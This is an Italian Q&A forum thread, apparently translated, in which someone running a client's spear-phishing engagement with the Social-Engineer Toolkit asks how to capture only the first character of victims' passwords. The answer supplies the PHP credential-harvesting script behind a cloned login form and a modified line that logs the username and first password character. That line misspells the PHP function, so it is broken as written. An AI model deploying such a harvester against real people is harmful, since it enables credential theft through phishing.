Setoolkit - harvester credenziali, visualizza solo il primo carattere della password

0

Sto lanciando una campagna di spear phishing e il mio cliente mi ha specificamente chiesto di raccogliere solo il primo carattere della password, c'è un modo per farlo?

Sostanzialmente invece di mostrare l'intera password quando un utente inserirà il suo, voglio che appaia solo il primo carattere.

Altrimenti, è possibile produrre un hashing quando la password viene inviata al server Apache?

    
posta winsmak 08.07.2016 - 11:00
fonte

1 risposta

1

Se stai usando l'opzione a cui sto pensando, la tua forma clonata è POST di post.php. Puoi modificare lo script per farlo fare ciò che desideri.

<?php
$file = 'harvester_sdfskksdks.txt';
file_put_contents($file, print_r($_POST, true), FILE_APPEND);
?>

<meta http-equiv="refresh" content="0; url=http://0.0.0.0:8000/index.html" />

Invece di scrivere tutti $ var, basta fare

file_puts_content($file, $_POST['login'] . ':' . substr($_POST['password'], 0, 1), FILE_APPEND)
    
risposta data 08.07.2016 - 16:17
fonte

Leggi altre domande sui tag